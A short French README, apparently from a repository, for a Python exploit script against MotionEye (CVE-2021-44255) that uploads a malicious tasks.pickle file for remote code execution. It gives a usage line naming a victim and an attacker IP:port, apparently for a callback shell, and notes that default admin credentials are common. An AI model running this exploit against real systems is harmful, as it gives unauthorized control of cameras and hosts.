
Un script Python 3 qui téléverse un fichier tasks.pickle permettant une exécution de code à distance (RCE) dans MotionEye. CVE-2021-44255
Un script Python 3 qui téléverse un fichier tasks.pickle permettant une exécution de code à distance (RCE) dans MotionEye. Vous avez besoin des identifiants administrateur, ce ne devrait donc pas être un gros problème. Malheureusement, MotionEye/MotionEyeOS se trouve fréquemment en cours d'exécution avec des identifiants par défaut.
Exemple :
main.py --victim 192.168.1.2 --attacker 192.168.1.3:4444
Où victim et attacker sont au format ip:port, sauf s'il s'agit du port 80. Dans ce cas, le port peut être omis. Ceci utilise le nom d'utilisateur par défaut admin avec un mot de passe vide. Il existe également des options CLI pour des noms d'utilisateurs/mots de passe alternatifs. Veuillez consulter le code pour plus de détails.
CVE-2021-44255
Voir https://www.pizzapower.me/2021/10/09/self-hosted-security-part-1-motioneye pour une analyse détaillée de ce problème et d'autres.